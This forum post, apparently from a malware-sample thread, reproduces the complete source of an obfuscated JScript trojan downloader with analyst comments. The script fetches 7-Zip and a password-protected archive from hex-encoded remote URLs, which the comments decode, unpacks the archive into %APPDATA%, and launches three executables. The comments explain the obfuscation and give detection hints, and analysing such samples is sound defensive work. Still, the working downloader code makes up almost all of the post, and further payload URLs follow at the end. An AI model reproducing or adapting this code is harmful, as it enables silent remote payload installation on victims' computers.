ikolor wrote: Next: a JS trojan downloader. It attempts to download and execute files; the files are unavailable.
https://www.virustotal.com/en/file/bfe2 ... 474222186/
// Obfuscation string table: every literal the script uses (COM ProgIDs, member
// names, paths, URLs) is referenced by index as _$_1538[n] so that nothing
// meaningful appears in clear text. Analyst notes give the index ranges.
var _$_1538 = ["", "Process", "Environment", "WScript.Shell", "APPDATA", "e", "x", "\\st4rrys1lr0.", "\\v0rgk34z0l.", "\\r1ssud0sk0.", "MSXML2.XMLHTTP", "ADODB.Stream", "GET", "Open", "Send", "type", "open", "responseBody", "write", // [0]-[18]: shell/env names, dropped file name stems, XMLHTTP and ADODB.Stream members
"savetofile", "toString", "length", "0", "%", "s/[^0-9A-Z]//g", "replace", "toUpperCase", "charAt", "p", "z", "i", "\\Nalywynhol.", "63706C32303135", "687474703A2F2F6C6569746F722E636F6D2E62722F536B792F377A612E", "\\7za.", // [19]-[31]: decoder helpers and archive name; [32],[33]: hex-encoded strings decoded at runtime by keyCount()
"687474703A2F2F6C6569746F722E636F6D2E62722F536B792F44616B6E6565726F647370612E", " x ", " -p", " -o", "\\", "Wscript.Shell", "Run", "Exec"]; // [35]: second hex-encoded URL; [36]-[39]: 7-Zip command-line fragments (x, -p, -o); [40]-[42]: WScript.Shell Run/Exec
// --- Stage 0: environment setup ---------------------------------------------
// Three placeholder variables that are never used (and are re-declared at the
// end of the script); presumably noise to alter the file hash / defeat
// signature matching.
var GRAMER = _$_1538[0];
var SSL = _$_1538[0];
var SHA456 = _$_1538[0];
// new ActiveXObject("WScript.Shell").Environment("Process") -> the process
// environment block. Implicit global (no `var`).
environmentVars = new ActiveXObject(_$_1538[3])[_$_1538[2]](_$_1538[1]);
// Value of %APPDATA%: the drop directory for every file written below.
var strNameShow = environmentVars(_$_1538[4]);
// "e" + "x" + "e" -> the extension "exe", assembled piecewise so the literal
// string never appears in the table.
var outb = _$_1538[5];
var kiss = _$_1538[5];
var join = kiss + _$_1538[6];
var fill = join + outb;
var skypeLocal = strNameShow;
// Relative names of the three executables the script expects to find after
// extraction: "\st4rrys1lr0.exe", "\v0rgk34z0l.exe", "\r1ssud0sk0.exe".
var dinamicy = _$_1538[7] + fill;
var dinamicy2 = _$_1538[8] + fill;
var dinamicy3 = _$_1538[9] + fill;
// Busy-wait "sleep": spins on new Date() until k milliseconds have elapsed.
// Burns a CPU core instead of calling WScript.Sleep; invoked below with
// k = 90000 (90 s) between launching the extracted executables.
function wait(k) {
var h = new Date();
var j = null;
do {
j = new Date()
} while (j - h < k);
}
// Download helper: synchronous HTTP GET of URL `g` through MSXML2.XMLHTTP, then
// the raw responseBody is pushed through an ADODB.Stream opened in binary mode
// (type = 1) and written to path `f` with savetofile(f, 2), i.e. overwrite if
// the file already exists. There is no status check or error handling:
// whatever body the server returns (including an error page) is saved as-is,
// and a COM error from Send() aborts the whole script.
// xHttp and bStrm are implicit globals (no `var`).
// Detection hint: wscript.exe performing HTTP GETs and creating executables
// under %APPDATA% via ADODB.Stream is the behavioural signature of this stage.
function submainpu(g, f) {
xHttp = new ActiveXObject(_$_1538[10]);    // MSXML2.XMLHTTP
bStrm = new ActiveXObject(_$_1538[11]);    // ADODB.Stream
xHttp[_$_1538[13]](_$_1538[12], g, false); // Open("GET", g, async = false)
xHttp[_$_1538[14]]();                      // Send()
bStrm[_$_1538[15]] = 1;                    // type = 1 (binary)
bStrm[_$_1538[16]]();                      // open()
bStrm[_$_1538[18]](xHttp[_$_1538[17]]);    // write(responseBody)
bStrm[_$_1538[19]](f, 2)                   // savetofile(f, 2 = create/overwrite)
}
// Byte value -> single character. a.toString(16) yields the hex digits, a
// leading "0" is prepended for values below 0x10, and unescape("%XX") turns
// the percent-escape into the corresponding character. Per-byte decoder used
// by keyCount(). Note: a non-numeric `a` (e.g. undefined from a failed table
// lookup) makes the toString call throw.
function charmerr(a) {
a = a[_$_1538[20]](16);          // toString(16)
if (a[_$_1538[21]] == 1) {       // length == 1
a = _$_1538[22] + a              // "0" + a
};
a = _$_1538[23] + a;             // "%" + a
return unescape(a)
}
// Lookup table: two-character uppercase hex pair -> byte value (0..255).
// Functionally the same as parseInt(pair, 16); spelled out as a literal so the
// decoder in keyCount() needs no parsing call. Keys must be uppercase, which
// keyCount() guarantees via toUpperCase(); any other pair yields undefined.
var valuekeyhx = {
"00": 0,
"01": 1,
"02": 2,
"03": 3,
"04": 4,
"05": 5,
"06": 6,
"07": 7,
"08": 8,
"09": 9,
"0A": 10,
"0B": 11,
"0C": 12,
"0D": 13,
"0E": 14,
"0F": 15,
"10": 16,
"11": 17,
"12": 18,
"13": 19,
"14": 20,
"15": 21,
"16": 22,
"17": 23,
"18": 24,
"19": 25,
"1A": 26,
"1B": 27,
"1C": 28,
"1D": 29,
"1E": 30,
"1F": 31,
"20": 32,
"21": 33,
"22": 34,
"23": 35,
"24": 36,
"25": 37,
"26": 38,
"27": 39,
"28": 40,
"29": 41,
"2A": 42,
"2B": 43,
"2C": 44,
"2D": 45,
"2E": 46,
"2F": 47,
"30": 48,
"31": 49,
"32": 50,
"33": 51,
"34": 52,
"35": 53,
"36": 54,
"37": 55,
"38": 56,
"39": 57,
"3A": 58,
"3B": 59,
"3C": 60,
"3D": 61,
"3E": 62,
"3F": 63,
"40": 64,
"41": 65,
"42": 66,
"43": 67,
"44": 68,
"45": 69,
"46": 70,
"47": 71,
"48": 72,
"49": 73,
"4A": 74,
"4B": 75,
"4C": 76,
"4D": 77,
"4E": 78,
"4F": 79,
"50": 80,
"51": 81,
"52": 82,
"53": 83,
"54": 84,
"55": 85,
"56": 86,
"57": 87,
"58": 88,
"59": 89,
"5A": 90,
"5B": 91,
"5C": 92,
"5D": 93,
"5E": 94,
"5F": 95,
"60": 96,
"61": 97,
"62": 98,
"63": 99,
"64": 100,
"65": 101,
"66": 102,
"67": 103,
"68": 104,
"69": 105,
"6A": 106,
"6B": 107,
"6C": 108,
"6D": 109,
"6E": 110,
"6F": 111,
"70": 112,
"71": 113,
"72": 114,
"73": 115,
"74": 116,
"75": 117,
"76": 118,
"77": 119,
"78": 120,
"79": 121,
"7A": 122,
"7B": 123,
"7C": 124,
"7D": 125,
"7E": 126,
"7F": 127,
"80": 128,
"81": 129,
"82": 130,
"83": 131,
"84": 132,
"85": 133,
"86": 134,
"87": 135,
"88": 136,
"89": 137,
"8A": 138,
"8B": 139,
"8C": 140,
"8D": 141,
"8E": 142,
"8F": 143,
"90": 144,
"91": 145,
"92": 146,
"93": 147,
"94": 148,
"95": 149,
"96": 150,
"97": 151,
"98": 152,
"99": 153,
"9A": 154,
"9B": 155,
"9C": 156,
"9D": 157,
"9E": 158,
"9F": 159,
"A0": 160,
"A1": 161,
"A2": 162,
"A3": 163,
"A4": 164,
"A5": 165,
"A6": 166,
"A7": 167,
"A8": 168,
"A9": 169,
"AA": 170,
"AB": 171,
"AC": 172,
"AD": 173,
"AE": 174,
"AF": 175,
"B0": 176,
"B1": 177,
"B2": 178,
"B3": 179,
"B4": 180,
"B5": 181,
"B6": 182,
"B7": 183,
"B8": 184,
"B9": 185,
"BA": 186,
"BB": 187,
"BC": 188,
"BD": 189,
"BE": 190,
"BF": 191,
"C0": 192,
"C1": 193,
"C2": 194,
"C3": 195,
"C4": 196,
"C5": 197,
"C6": 198,
"C7": 199,
"C8": 200,
"C9": 201,
"CA": 202,
"CB": 203,
"CC": 204,
"CD": 205,
"CE": 206,
"CF": 207,
"D0": 208,
"D1": 209,
"D2": 210,
"D3": 211,
"D4": 212,
"D5": 213,
"D6": 214,
"D7": 215,
"D8": 216,
"D9": 217,
"DA": 218,
"DB": 219,
"DC": 220,
"DD": 221,
"DE": 222,
"DF": 223,
"E0": 224,
"E1": 225,
"E2": 226,
"E3": 227,
"E4": 228,
"E5": 229,
"E6": 230,
"E7": 231,
"E8": 232,
"E9": 233,
"EA": 234,
"EB": 235,
"EC": 236,
"ED": 237,
"EE": 238,
"EF": 239,
"F0": 240,
"F1": 241,
"F2": 242,
"F3": 243,
"F4": 244,
"F5": 245,
"F6": 246,
"F7": 247,
"F8": 248,
"F9": 249,
"FA": 250,
"FB": 251,
"FC": 252,
"FD": 253,
"FE": 254,
"FF": 255
};
// Hex-string decoder: returns the string whose bytes are the hex pairs in `e`.
// Upper-cases the input, then walks it two characters at a time, mapping each
// pair through valuekeyhx and charmerr(). A trailing odd nibble is silently
// dropped; a non-hex pair produces undefined and makes charmerr() throw.
// NOTE(review): the "sanitising" replace() is effectively a no-op. The pattern
// "s/[^0-9A-Z]//g" is a sed substitution pasted into new RegExp() with no
// flags, so it only matches the literal text "s/", one character outside
// [0-9A-Z], then "//g" (and would replace it with "undefined", the missing
// second argument). It never fires on the hex inputs used in this script.
function keyCount(e) {
e = e[_$_1538[26]]()[_$_1538[25]](new RegExp(_$_1538[24])); // toUpperCase().replace(RegExp("s/[^0-9A-Z]//g"))
var d = _$_1538[0];  // decoded output
var c = _$_1538[0];  // hex pair currently being accumulated
for (var b = 0; b < e[_$_1538[21]]; b++) {
c += e[_$_1538[27]](b);          // charAt(b)
if (c[_$_1538[21]] == 2) {
d += charmerr(valuekeyhx[c]);    // pair -> byte -> character
c = _$_1538[0]
}
};
return d
}
// --- Stage 1: fetch, extract, launch -----------------------------------------
// "z" + "i" + "p" -> "zip", assembled piecewise like "exe" above.
var last = _$_1538[28];
var kings = _$_1538[29];
var buy = kings + _$_1538[30];
var still = buy + last;
// "\Nalywynhol.zip": local name given to the downloaded archive.
var unzname = _$_1538[31] + still;
// Archive password, stored hex-encoded in the table and decoded at runtime
// (analyst decode of [32]: "cpl2015").
var uncode = keyCount(_$_1538[32]);
// Download 1: decoded URL + "exe" -> %APPDATA%\7za.exe, a copy of the 7-Zip
// command-line tool (analyst decode of [33]: hxxp://leitor.com.br/Sky/7za.exe).
// A legitimate tool is fetched so the script can unpack a password-protected
// archive, which keeps the payload opaque to transit inspection.
submainpu(keyCount(_$_1538[33]) + fill, skypeLocal + _$_1538[34] + fill);
// Download 2: decoded URL + "zip" -> %APPDATA%\Nalywynhol.zip
// (analyst decode of [35]: hxxp://leitor.com.br/Sky/Dakneerodspa.zip).
submainpu(keyCount(_$_1538[35]) + still, skypeLocal + unzname);
// 7-Zip extraction command line, of the form
//   %APPDATA%\7za.exe x %APPDATA%\Nalywynhol.zip -p<password> -o%APPDATA%\
// Implicit global (no `var`).
compilerVar = skypeLocal + _$_1538[34] + fill + _$_1538[36] + skypeLocal + unzname + _$_1538[37] + uncode + _$_1538[38] + skypeLocal + _$_1538[39];
// Full paths of the three executables expected inside the archive.
var mystring = skypeLocal + dinamicy;
var mystring2 = skypeLocal + dinamicy2;
var mystring3 = skypeLocal + dinamicy3;
// WScript.Shell.Run(cmd, 1, 1): window style 1 (normal window), bWaitOnReturn
// = 1 so the script blocks until 7-Zip has finished extracting. Implicit global.
asgone = new ActiveXObject(_$_1538[40]);
asgone[_$_1538[41]](compilerVar, 1, 1);
// Exec() the first extracted binary, busy-wait 90 s, then Exec() the other
// two. A fresh WScript.Shell is created for each call. The delay presumably
// gives the first payload time to run, and incidentally outlasts short
// sandbox timeouts. Detection hint: wscript.exe spawning 7za.exe and then
// three freshly written executables from %APPDATA% is the process-tree
// signature of this stage.
WSHELL = new ActiveXObject(_$_1538[40]);
WSHELL[_$_1538[42]](mystring);
wait(90000);
WSHELL = new ActiveXObject(_$_1538[40]);
WSHELL[_$_1538[42]](mystring2);
WSHELL = new ActiveXObject(_$_1538[40]);
WSHELL[_$_1538[42]](mystring3);
WSHELL = null;
// Duplicate trailing declarations of the unused placeholders from the top of
// the script; no effect on behaviour.
var GRAMER = _$_1538[0];
var SSL = _$_1538[0];
var SHA456 = _$_1538[0]
hxxp://31.41.220.111/Slaver/horoscopo.zip
https://virustotal.com/en/file/03fda5f6 ... /analysis/
hxxp://31.41.220.111/Slaver/7za.exe